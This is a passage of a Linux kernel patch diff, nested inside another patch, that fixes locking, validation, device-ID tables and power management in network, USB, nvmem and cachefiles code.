+ 	netif_napi_add_tx(ndev, &priv->tx_napi, mtk_star_tx_poll);
+ 
++	phydev = of_phy_find_device(priv->phy_node);
++	if (phydev) {
++		phydev->mac_managed_pm = true;
++		put_device(&phydev->mdio.dev);
++	}
++
+ 	return devm_register_netdev(dev, ndev);
+ }
+ 
+diff --git a/drivers/net/ethernet/micrel/ks8851_common.c b/drivers/net/ethernet/micrel/ks8851_common.c
+index 6453c92f0fa7c..7fa1820db9cce 100644
+--- a/drivers/net/ethernet/micrel/ks8851_common.c
++++ b/drivers/net/ethernet/micrel/ks8851_common.c
+@@ -352,11 +352,11 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 		netif_dbg(ks, intr, ks->netdev,
+ 			  "%s: txspace %d\n", __func__, tx_space);
+ 
+-		spin_lock(&ks->statelock);
++		spin_lock_bh(&ks->statelock);
+ 		ks->tx_space = tx_space;
+ 		if (netif_queue_stopped(ks->netdev))
+ 			netif_wake_queue(ks->netdev);
+-		spin_unlock(&ks->statelock);
++		spin_unlock_bh(&ks->statelock);
+ 	}
+ 
+ 	if (status & IRQ_SPIBEI) {
+@@ -482,6 +482,7 @@ static int ks8851_net_open(struct net_device *dev)
+ 	ks8851_wrreg16(ks, KS_IER, ks->rc_ier);
+ 
+ 	ks->queued_len = 0;
++	ks->tx_space = ks8851_rdreg16(ks, KS_TXMIR);
+ 	netif_start_queue(ks->netdev);
+ 
+ 	netif_dbg(ks, ifup, ks->netdev, "network device up\n");
+@@ -635,14 +636,14 @@ static void ks8851_set_rx_mode(struct net_device *dev)
+ 
+ 	/* schedule work to do the actual set of the data if needed */
+ 
+-	spin_lock(&ks->statelock);
++	spin_lock_bh(&ks->statelock);
+ 
+ 	if (memcmp(&rxctrl, &ks->rxctrl, sizeof(rxctrl)) != 0) {
+ 		memcpy(&ks->rxctrl, &rxctrl, sizeof(ks->rxctrl));
+ 		schedule_work(&ks->rxctrl_work);
+ 	}
+ 
+-	spin_unlock(&ks->statelock);
++	spin_unlock_bh(&ks->statelock);
+ }
+ 
+ static int ks8851_set_mac_address(struct net_device *dev, void *addr)
+@@ -1101,7 +1102,6 @@ int ks8851_probe_common(struct net_device *netdev, struct device *dev,
+ 	int ret;
+ 
+ 	ks->netdev = netdev;
+-	ks->tx_space = 6144;
+ 
+ 	ks->gpio = devm_gpiod_get_optional(dev, "reset", GPIOD_OUT_HIGH);
+ 	ret = PTR_ERR_OR_ZERO(ks->gpio);
+diff --git a/drivers/net/ethernet/micrel/ks8851_spi.c b/drivers/net/ethernet/micrel/ks8851_spi.c
+index 4dcbff789b19d..e33a5e7beb39e 100644
+--- a/drivers/net/ethernet/micrel/ks8851_spi.c
++++ b/drivers/net/ethernet/micrel/ks8851_spi.c
+@@ -340,10 +340,10 @@ static void ks8851_tx_work(struct work_struct *work)
+ 
+ 	tx_space = ks8851_rdreg16_spi(ks, KS_TXMIR);
+ 
+-	spin_lock(&ks->statelock);
++	spin_lock_bh(&ks->statelock);
+ 	ks->queued_len -= dequeued_len;
+ 	ks->tx_space = tx_space;
+-	spin_unlock(&ks->statelock);
++	spin_unlock_bh(&ks->statelock);
+ 
+ 	ks8851_unlock_spi(ks, &flags);
+ }
+diff --git a/drivers/net/phy/microchip_t1.c b/drivers/net/phy/microchip_t1.c
+index 8569a545e0a3f..9517243e3051e 100644
+--- a/drivers/net/phy/microchip_t1.c
++++ b/drivers/net/phy/microchip_t1.c
+@@ -711,7 +711,7 @@ static int lan87xx_cable_test_report(struct phy_device *phydev)
+ 	ethnl_cable_test_result(phydev, ETHTOOL_A_CABLE_PAIR_A,
+ 				lan87xx_cable_test_report_trans(detect));
+ 
+-	return 0;
++	return phy_init_hw(phydev);
+ }
+ 
+ static int lan87xx_cable_test_get_status(struct phy_device *phydev,
+diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
+index 1d71f5276241c..5a6fa566e722f 100644
+--- a/drivers/net/ppp/ppp_generic.c
++++ b/drivers/net/ppp/ppp_generic.c
+@@ -70,6 +70,7 @@
+ #define MPHDRLEN_SSN	4	/* ditto with short sequence numbers */
+ 
+ #define PPP_PROTO_LEN	2
++#define PPP_LCP_HDRLEN	4
+ 
+ /*
+  * An instance of /dev/ppp can be associated with either a ppp
+@@ -491,6 +492,15 @@ static ssize_t ppp_read(struct file *file, char __user *buf,
+ 	return ret;
+ }
+ 
++static bool ppp_check_packet(struct sk_buff *skb, size_t count)
++{
++	/* LCP packets must include LCP header which 4 bytes long:
++	 * 1-byte code, 1-byte identifier, and 2-byte length.
++	 */
++	return get_unaligned_be16(skb->data) != PPP_LCP ||
++		count >= PPP_PROTO_LEN + PPP_LCP_HDRLEN;
++}
++
+ static ssize_t ppp_write(struct file *file, const char __user *buf,
+ 			 size_t count, loff_t *ppos)
+ {
+@@ -513,6 +523,11 @@ static ssize_t ppp_write(struct file *file, const char __user *buf,
+ 		kfree_skb(skb);
+ 		goto out;
+ 	}
++	ret = -EINVAL;
++	if (unlikely(!ppp_check_packet(skb, count))) {
++		kfree_skb(skb);
++		goto out;
++	}
+ 
+ 	switch (pf->kind) {
+ 	case INTERFACE:
+diff --git a/drivers/net/wireguard/allowedips.c b/drivers/net/wireguard/allowedips.c
+index 0ba714ca5185c..4b8528206cc8a 100644
+--- a/drivers/net/wireguard/allowedips.c
++++ b/drivers/net/wireguard/allowedips.c
+@@ -15,8 +15,8 @@ static void swap_endian(u8 *dst, const u8 *src, u8 bits)
+ 	if (bits == 32) {
+ 		*(u32 *)dst = be32_to_cpu(*(const __be32 *)src);
+ 	} else if (bits == 128) {
+-		((u64 *)dst)[0] = be64_to_cpu(((const __be64 *)src)[0]);
+-		((u64 *)dst)[1] = be64_to_cpu(((const __be64 *)src)[1]);
++		((u64 *)dst)[0] = get_unaligned_be64(src);
++		((u64 *)dst)[1] = get_unaligned_be64(src + 8);
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireguard/queueing.h b/drivers/net/wireguard/queueing.h
+index 1d4f9196bfe17..3ce70db9dd3fe 100644
+--- a/drivers/net/wireguard/queueing.h
++++ b/drivers/net/wireguard/queueing.h
+@@ -124,10 +124,10 @@ static inline int wg_cpumask_choose_online(int *stored_cpu, unsigned int id)
+  */
+ static inline int wg_cpumask_next_online(int *last_cpu)
+ {
+-	int cpu = cpumask_next(*last_cpu, cpu_online_mask);
++	int cpu = cpumask_next(READ_ONCE(*last_cpu), cpu_online_mask);
+ 	if (cpu >= nr_cpu_ids)
+ 		cpu = cpumask_first(cpu_online_mask);
+-	*last_cpu = cpu;
++	WRITE_ONCE(*last_cpu, cpu);
+ 	return cpu;
+ }
+ 
+diff --git a/drivers/net/wireguard/send.c b/drivers/net/wireguard/send.c
+index 0d48e0f4a1ba3..26e09c30d596c 100644
+--- a/drivers/net/wireguard/send.c
++++ b/drivers/net/wireguard/send.c
+@@ -222,7 +222,7 @@ void wg_packet_send_keepalive(struct wg_peer *peer)
+ {
+ 	struct sk_buff *skb;
+ 
+-	if (skb_queue_empty(&peer->staged_packet_queue)) {
++	if (skb_queue_empty_lockless(&peer->staged_packet_queue)) {
+ 		skb = alloc_skb(DATA_PACKET_HEAD_ROOM + MESSAGE_MINIMUM_LENGTH,
+ 				GFP_ATOMIC);
+ 		if (unlikely(!skb))
+diff --git a/drivers/nvmem/core.c b/drivers/nvmem/core.c
+index 34ee9d36ee7ba..f060583941027 100644
+--- a/drivers/nvmem/core.c
++++ b/drivers/nvmem/core.c
+@@ -367,10 +367,9 @@ static int nvmem_sysfs_setup_compat(struct nvmem_device *nvmem,
+ 	if (!config->base_dev)
+ 		return -EINVAL;
+ 
+-	if (config->type == NVMEM_TYPE_FRAM)
+-		bin_attr_nvmem_eeprom_compat.attr.name = "fram";
+-
+ 	nvmem->eeprom = bin_attr_nvmem_eeprom_compat;
++	if (config->type == NVMEM_TYPE_FRAM)
++		nvmem->eeprom.attr.name = "fram";
+ 	nvmem->eeprom.attr.mode = nvmem_bin_attr_get_umode(nvmem);
+ 	nvmem->eeprom.size = nvmem->size;
+ #ifdef CONFIG_DEBUG_LOCK_ALLOC
+diff --git a/drivers/nvmem/meson-efuse.c b/drivers/nvmem/meson-efuse.c
+index ba2714bef8d0e..cf1b249e67ca2 100644
+--- a/drivers/nvmem/meson-efuse.c
++++ b/drivers/nvmem/meson-efuse.c
+@@ -18,18 +18,24 @@ static int meson_efuse_read(void *context, unsigned int offset,
+ 			    void *val, size_t bytes)
+ {
+ 	struct meson_sm_firmware *fw = context;
++	int ret;
+ 
+-	return meson_sm_call_read(fw, (u8 *)val, bytes, SM_EFUSE_READ, offset,
+-				  bytes, 0, 0, 0);
++	ret = meson_sm_call_read(fw, (u8 *)val, bytes, SM_EFUSE_READ, offset,
++				 bytes, 0, 0, 0);
++
++	return ret < 0 ? ret : 0;
+ }
+ 
+ static int meson_efuse_write(void *context, unsigned int offset,
+ 			     void *val, size_t bytes)
+ {
+ 	struct meson_sm_firmware *fw = context;
++	int ret;
++
++	ret = meson_sm_call_write(fw, (u8 *)val, bytes, SM_EFUSE_WRITE, offset,
++				  bytes, 0, 0, 0);
+ 
+-	return meson_sm_call_write(fw, (u8 *)val, bytes, SM_EFUSE_WRITE, offset,
+-				   bytes, 0, 0, 0);
++	return ret < 0 ? ret : 0;
+ }
+ 
+ static const struct of_device_id meson_efuse_match[] = {
+diff --git a/drivers/nvmem/rmem.c b/drivers/nvmem/rmem.c
+index 752d0bf4445ee..7f907c5a445e7 100644
+--- a/drivers/nvmem/rmem.c
++++ b/drivers/nvmem/rmem.c
+@@ -46,7 +46,10 @@ static int rmem_read(void *context, unsigned int offset,
+ 
+ 	memunmap(addr);
+ 
+-	return count;
++	if (count < 0)
++		return count;
++
++	return count == bytes ? 0 : -EIO;
+ }
+ 
+ static int rmem_probe(struct platform_device *pdev)
+diff --git a/drivers/platform/x86/toshiba_acpi.c b/drivers/platform/x86/toshiba_acpi.c
+index 1a8cb8eb22829..033e28aaeea63 100644
+--- a/drivers/platform/x86/toshiba_acpi.c
++++ b/drivers/platform/x86/toshiba_acpi.c
+@@ -3305,6 +3305,7 @@ static const struct dmi_system_id toshiba_dmi_quirks[] __initconst = {
+ 		},
+ 	 .driver_data = (void *)(QUIRK_TURN_ON_PANEL_ON_RESUME | QUIRK_HCI_HOTKEY_QUICKSTART),
+ 	},
++	{ }
+ };
+ 
+ static int toshiba_acpi_add(struct acpi_device *acpi_dev)
+diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
+index d396ac8b9cedd..15613b183fbd0 100644
+--- a/drivers/usb/core/config.c
++++ b/drivers/usb/core/config.c
+@@ -291,6 +291,20 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	if (ifp->desc.bNumEndpoints >= num_ep)
+ 		goto skip_to_next_endpoint_or_interface_descriptor;
+ 
++	/* Save a copy of the descriptor and use it instead of the original */
++	endpoint = &ifp->endpoint[ifp->desc.bNumEndpoints];
++	memcpy(&endpoint->desc, d, n);
++	d = &endpoint->desc;
++
++	/* Clear the reserved bits in bEndpointAddress */
++	i = d->bEndpointAddress &
++			(USB_ENDPOINT_DIR_MASK | USB_ENDPOINT_NUMBER_MASK);
++	if (i != d->bEndpointAddress) {
++		dev_notice(ddev, "config %d interface %d altsetting %d has an endpoint descriptor with address 0x%X, changing to 0x%X\n",
++		    cfgno, inum, asnum, d->bEndpointAddress, i);
++		endpoint->desc.bEndpointAddress = i;
++	}
++
+ 	/* Check for duplicate endpoint addresses */
+ 	if (config_endpoint_is_duplicate(config, inum, asnum, d)) {
+ 		dev_notice(ddev, "config %d interface %d altsetting %d has a duplicate endpoint with address 0x%X, skipping\n",
+@@ -308,10 +322,8 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 		}
+ 	}
+ 
+-	endpoint = &ifp->endpoint[ifp->desc.bNumEndpoints];
++	/* Accept this endpoint */
+ 	++ifp->desc.bNumEndpoints;
+-
+-	memcpy(&endpoint->desc, d, n);
+ 	INIT_LIST_HEAD(&endpoint->urb_list);
+ 
+ 	/*
+diff --git a/drivers/usb/core/quirks.c b/drivers/usb/core/quirks.c
+index b4783574b8e66..13171454f9591 100644
+--- a/drivers/usb/core/quirks.c
++++ b/drivers/usb/core/quirks.c
+@@ -506,6 +506,9 @@ static const struct usb_device_id usb_quirk_list[] = {
+ 	{ USB_DEVICE(0x1b1c, 0x1b38), .driver_info = USB_QUIRK_DELAY_INIT |
+ 	  USB_QUIRK_DELAY_CTRL_MSG },
+ 
++	/* START BP-850k Printer */
++	{ USB_DEVICE(0x1bc3, 0x0003), .driver_info = USB_QUIRK_NO_SET_INTF },
++
+ 	/* MIDI keyboard WORLDE MINI */
+ 	{ USB_DEVICE(0x1c75, 0x0204), .driver_info =
+ 			USB_QUIRK_CONFIG_INTF_STRINGS },
+diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
+index b94aec6227c51..5c1c7f36e5442 100644
+--- a/drivers/usb/gadget/configfs.c
++++ b/drivers/usb/gadget/configfs.c
+@@ -105,9 +105,12 @@ static int usb_string_copy(const char *s, char **s_copy)
+ 	int ret;
+ 	char *str;
+ 	char *copy = *s_copy;
++
+ 	ret = strlen(s);
+ 	if (ret > USB_MAX_STRING_LEN)
+ 		return -EOVERFLOW;
++	if (ret < 1)
++		return -EINVAL;
+ 
+ 	if (copy) {
+ 		str = copy;
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 27e01671d3865..505f45429c125 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -1247,10 +1247,20 @@ int xhci_resume(struct xhci_hcd *xhci, bool hibernated)
+ 			xhci_dbg(xhci, "Start the secondary HCD\n");
+ 			retval = xhci_run(xhci->shared_hcd);
+ 		}
+-
++		if (retval)
++			return retval;
++		/*
++		 * Resume roothubs unconditionally as PORTSC change bits are not
++		 * immediately visible after xHC reset
++		 */
+ 		hcd->state = HC_STATE_SUSPENDED;
+-		if (xhci->shared_hcd)
++
++		if (xhci->shared_hcd) {
+ 			xhci->shared_hcd->state = HC_STATE_SUSPENDED;
++			usb_hcd_resume_root_hub(xhci->shared_hcd);
++		}
++		usb_hcd_resume_root_hub(hcd);
++
+ 		goto done;
+ 	}
+ 
+@@ -1274,7 +1284,6 @@ int xhci_resume(struct xhci_hcd *xhci, bool hibernated)
+ 
+ 	xhci_dbc_resume(xhci);
+ 
+- done:
+ 	if (retval == 0) {
+ 		/*
+ 		 * Resume roothubs only if there are pending events.
+@@ -1293,6 +1302,7 @@ int xhci_resume(struct xhci_hcd *xhci, bool hibernated)
+ 			usb_hcd_resume_root_hub(hcd);
+ 		}
+ 	}
++done:
+ 	/*
+ 	 * If system is subject to the Quirk, Compliance Mode Timer needs to
+ 	 * be re-initialized Always after a system resume. Ports are subject
+diff --git a/drivers/usb/serial/mos7840.c b/drivers/usb/serial/mos7840.c
+index 6b12bb4648b83..26f287180f8ab 100644
+--- a/drivers/usb/serial/mos7840.c
++++ b/drivers/usb/serial/mos7840.c
+@@ -1736,6 +1736,49 @@ static void mos7840_port_remove(struct usb_serial_port *port)
+ 	kfree(mos7840_port);
+ }
+ 
++static int mos7840_suspend(struct usb_serial *serial, pm_message_t message)
++{
++	struct moschip_port *mos7840_port;
++	struct usb_serial_port *port;
++	int i;
++
++	for (i = 0; i < serial->num_ports; ++i) {
++		port = serial->port[i];
++		if (!tty_port_initialized(&port->port))
++			continue;
++
++		mos7840_port = usb_get_serial_port_data(port);
++
++		usb_kill_urb(mos7840_port->read_urb);
++		mos7840_port->read_urb_busy = false;
++	}
++
++	return 0;
++}
++
++static int mos7840_resume(struct usb_serial *serial)
++{
++	struct moschip_port *mos7840_port;
++	struct usb_serial_port *port;
++	int res;
++	int i;
++
++	for (i = 0; i < serial->num_ports; ++i) {
++		port = serial->port[i];
++		if (!tty_port_initialized(&port->port))
++			continue;
++
++		mos7840_port = usb_get_serial_port_data(port);
++
++		mos7840_port->read_urb_busy = true;
++		res = usb_submit_urb(mos7840_port->read_urb, GFP_NOIO);
++		if (res)
++			mos7840_port->read_urb_busy = false;
++	}
++
++	return 0;
++}
++
+ static struct usb_serial_driver moschip7840_4port_device = {
+ 	.driver = {
+ 		   .owner = THIS_MODULE,
+@@ -1763,6 +1806,8 @@ static struct usb_serial_driver moschip7840_4port_device = {
+ 	.port_probe = mos7840_port_probe,
+ 	.port_remove = mos7840_port_remove,
+ 	.read_bulk_callback = mos7840_bulk_in_callback,
++	.suspend = mos7840_suspend,
++	.resume = mos7840_resume,
+ };
+ 
+ static struct usb_serial_driver * const serial_drivers[] = {
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index b5ee8518fcc78..cb0eb7fd25426 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -1425,6 +1425,10 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = NCTRL(0) | RSVD(1) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1901, 0xff),	/* Telit LN940 (MBIM) */
+ 	  .driver_info = NCTRL(0) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x3000, 0xff),	/* Telit FN912 */
++	  .driver_info = RSVD(0) | NCTRL(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x3001, 0xff),	/* Telit FN912 */
++	  .driver_info = RSVD(0) | NCTRL(2) | RSVD(3) | RSVD(4) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x7010, 0xff),	/* Telit LE910-S1 (RNDIS) */
+ 	  .driver_info = NCTRL(2) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x7011, 0xff),	/* Telit LE910-S1 (ECM) */
+@@ -1433,6 +1437,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = NCTRL(2) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x701b, 0xff),	/* Telit LE910R1 (ECM) */
+ 	  .driver_info = NCTRL(2) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x9000, 0xff),	/* Telit generic core-dump device */
++	  .driver_info = NCTRL(0) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, 0x9010),				/* Telit SBL FN980 flashing device */
+ 	  .driver_info = NCTRL(0) | ZLP },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, 0x9200),				/* Telit LE910S1 flashing device */
+@@ -2224,6 +2230,10 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_7106_2COM, 0x02, 0x02, 0x01) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_DC_4COM2, 0xff, 0x02, 0x01) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, MEDIATEK_PRODUCT_DC_4COM2, 0xff, 0x00, 0x00) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 0x7126, 0xff, 0x00, 0x00),
++	  .driver_info = NCTRL(2) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 0x7127, 0xff, 0x00, 0x00),
++	  .driver_info = NCTRL(2) | NCTRL(3) | NCTRL(4) },
+ 	{ USB_DEVICE(CELLIENT_VENDOR_ID, CELLIENT_PRODUCT_MEN200) },
+ 	{ USB_DEVICE(CELLIENT_VENDOR_ID, CELLIENT_PRODUCT_MPL200),
+ 	  .driver_info = RSVD(1) | RSVD(4) },
+@@ -2284,6 +2294,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(3) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0f0, 0xff),			/* Foxconn T99W373 MBIM */
+ 	  .driver_info = RSVD(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe145, 0xff),			/* Foxconn T99W651 RNDIS */
++	  .driver_info = RSVD(5) | RSVD(6) },
+ 	{ USB_DEVICE(0x1508, 0x1001),						/* Fibocom NL668 (IOT version) */
+ 	  .driver_info = RSVD(4) | RSVD(5) | RSVD(6) },
+ 	{ USB_DEVICE(0x1782, 0x4d10) },						/* Fibocom L610 (AT mode) */
+@@ -2321,6 +2333,32 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(4) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x0115, 0xff),			/* Rolling RW135-GL (laptop MBIM) */
+ 	  .driver_info = RSVD(5) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x0802, 0xff),			/* Rolling RW350-GL (laptop MBIM) */
++	  .driver_info = RSVD(5) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0100, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for Global */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0100, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0100, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0101, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WRD for Global SKU */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0101, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0101, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0106, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WRD for China SKU */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0106, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0106, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0111, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for SA */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0111, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0111, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0112, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for EU */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0112, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0112, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0113, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for NA */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0113, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0113, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0115, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for China EDU */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0115, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0115, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0116, 0xff, 0xff, 0x30) },	/* NetPrisma LCUK54-WWD for Golbal EDU */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0116, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x3731, 0x0116, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(OPPO_VENDOR_ID, OPPO_PRODUCT_R11, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x40) },
+diff --git a/fs/cachefiles/daemon.c b/fs/cachefiles/daemon.c
+index b9945e4f697be..89b11336a8369 100644
+--- a/fs/cachefiles/daemon.c
++++ b/fs/cachefiles/daemon.c
+@@ -357,14 +357,24 @@ static __poll_t cachefiles_daemon_poll(struct file *file,
+ 					   struct poll_table_struct *poll)
+ {
+ 	struct cachefiles_cache *cache = file->private_data;
++	XA_STATE(xas, &cache->reqs, 0);
++	struct cachefiles_req *req;
+ 	__poll_t mask;
+ 
+ 	poll_wait(file, &cache->daemon_pollwq, poll);
+ 	mask = 0;
+ 
+ 	if (cachefiles_in_ondemand_mode(cache)) {
+-		if (!xa_empty(&cache->reqs))
+-			mask |= EPOLLIN;
++		if (!xa_empty(&cache->reqs)) {
++			xas_lock(&xas);
++			xas_for_each_marked(&xas, req, ULONG_MAX, CACHEFILES_REQ_NEW) {
++				if (!cachefiles_ondemand_is_reopening_read(req)) {
++					mask |= EPOLLIN;
++					break;
++				}
++			}
++			xas_unlock(&xas);
++		}
+ 	} else {
+ 		if (test_bit(CACHEFILES_STATE_CHANGED, &cache->flags))
+ 			mask |= EPOLLIN;
+diff --git a/fs/cachefiles/internal.h b/fs/cachefiles/internal.h
+index 3eea52462fc87..111ad6ecd4baf 100644
+--- a/fs/cachefiles/internal.h
++++ b/fs/cachefiles/internal.h
+@@ -48,6 +48,7 @@ enum cachefiles_object_state {
+ 	CACHEFILES_ONDEMAND_OBJSTATE_CLOSE, /* Anonymous fd closed by daemon or initial state */
+ 	CACHEFILES_ONDEMAND_OBJSTATE_OPEN, /* Anonymous fd associated with object is available */
+ 	CACHEFILES_ONDEMAND_OBJSTATE_REOPENING, /* Object that was closed and is being reopened. */
++	CACHEFILES_ONDEMAND_OBJSTATE_DROPPING, /* Object is being dropped. */
+ };
+ 
+ struct cachefiles_ondemand_info {
+@@ -128,6 +129,7 @@ struct cachefiles_cache {
+ 	unsigned long			req_id_next;
+ 	struct xarray			ondemand_ids;	/* xarray for ondemand_id allocation */
+ 	u32				ondemand_id_next;
++	u32				msg_id_next;
+ };
+ 
+ static inline bool cachefiles_in_ondemand_mode(struct cachefiles_cache *cache)
+@@ -335,6 +337,14 @@ cachefiles_ondemand_set_object_##_state(struct cachefiles_object *object) \
+ CACHEFILES_OBJECT_STATE_FUNCS(open, OPEN);
+ CACHEFILES_OBJECT_STATE_FUNCS(close, CLOSE);
+ CACHEFILES_OBJECT_STATE_FUNCS(reopening, REOPENING);
++CACHEFILES_OBJECT_STATE_FUNCS(dropping, DROPPING);
++
++static inline bool cachefiles_ondemand_is_reopening_read(struct cachefiles_req *req)
++{
++	return cachefiles_ondemand_object_is_reopening(req->object) &&
++			req->msg.opcode == CACHEFILES_OP_READ;
++}
++
+ #else
+ static inline ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ 					char __user *_buffer, size_t buflen)
+@@ -365,6 +375,11 @@ static inline int cachefiles_ondemand_init_obj_info(struct cachefiles_object *ob
+ static inline void cachefiles_ondemand_deinit_obj_info(struct cachefiles_object *obj)
+ {
+ }
++
++static inline bool cachefiles_ondemand_is_reopening_read(struct cachefiles_req *req)
++{
++	return false;
++}
+ #endif
+ 
+ /*
+diff --git a/fs/cachefiles/ondemand.c b/fs/cachefiles/ondemand.c
+index 4b39f0422e590..51173ab6dbd84 100644
+--- a/fs/cachefiles/ondemand.c
++++ b/fs/cachefiles/ondemand.c
+@@ -494,7 +494,8 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 		 */
+ 		xas_lock(&xas);
+ 
+-		if (test_bit(CACHEFILES_DEAD, &cache->flags)) {
++		if (test_bit(CACHEFILES_DEAD, &cache->flags) ||
++		    cachefiles_ondemand_object_is_dropping(object)) {
+ 			xas_unlock(&xas);
+ 			ret = -EIO;
+ 			goto out;
+@@ -504,20 +505,32 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 		smp_mb();
+ 
+ 		if (opcode == CACHEFILES_OP_CLOSE &&
+-			!cachefiles_ondemand_object_is_open(object)) {
++		    !cachefiles_ondemand_object_is_open(object)) {
+ 			WARN_ON_ONCE(object->ondemand->ondemand_id == 0);
+ 			xas_unlock(&xas);
+ 			ret = -EIO;
+ 			goto out;
+ 		}
+ 
+-		xas.xa_index = 0;
++		/*
++		 * Cyclically find a free xas to avoid msg_id reuse that would
++		 * cause the daemon to successfully copen a stale msg_id.
++		 */
++		xas.xa_index = cache->msg_id_next;
+ 		xas_find_marked(&xas, UINT_MAX, XA_FREE_MARK);
++		if (xas.xa_node == XAS_RESTART) {
++			xas.xa_index = 0;
++			xas_find_marked(&xas, cache->msg_id_next - 1, XA_FREE_MARK);
++		}
+ 		if (xas.xa_node == XAS_RESTART)
+ 			xas_set_err(&xas, -EBUSY);
++
+ 		xas_store(&xas, req);
+-		xas_clear_mark(&xas, XA_FREE_MARK);
+-		xas_set_mark(&xas, CACHEFILES_REQ_NEW);
++		if (xas_valid(&xas)) {
++			cache->msg_id_next = xas.xa_index + 1;
++			xas_clear_mark(&xas, XA_FREE_MARK);
++			xas_set_mark(&xas, CACHEFILES_REQ_NEW);
++		}
+ 		xas_unlock(&xas);
+ 	} while (xas_nomem(&xas, GFP_KERNEL));
+ 
